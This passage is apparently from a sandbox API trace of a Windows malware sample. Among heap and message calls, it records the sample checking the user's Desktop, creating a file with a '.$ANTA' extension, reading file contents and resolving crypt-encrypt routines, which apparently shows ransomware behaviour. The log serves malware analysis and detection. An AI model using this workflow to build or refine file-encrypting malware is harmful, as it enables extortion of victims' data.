out: lpMsg=0x144f2dc) returned 0 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0120.904] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0120.904] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0120.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0120.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0120.905] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\az 2dgf6.ppt.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.907] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0120.907] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0120.907] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0120.907] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0120.910] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0120.910] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0xbc9f, lpOverlapped=0x0) returned 1 [0120.912] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0120.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbc9f) returned 0x49aa010 [0120.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbc9f) returned 0x49b5cb8 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.915] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbc9f) returned 0x49aa010 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0120.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.916] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0120.916] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0120.916] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbc9f) returned 0x49aa010 [0120.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbc9f) returned 0x49c1960 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0120.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0120.918] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0120.918] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0120.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.918] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0120.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0120.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0120.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0120.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0120.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0120.919] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 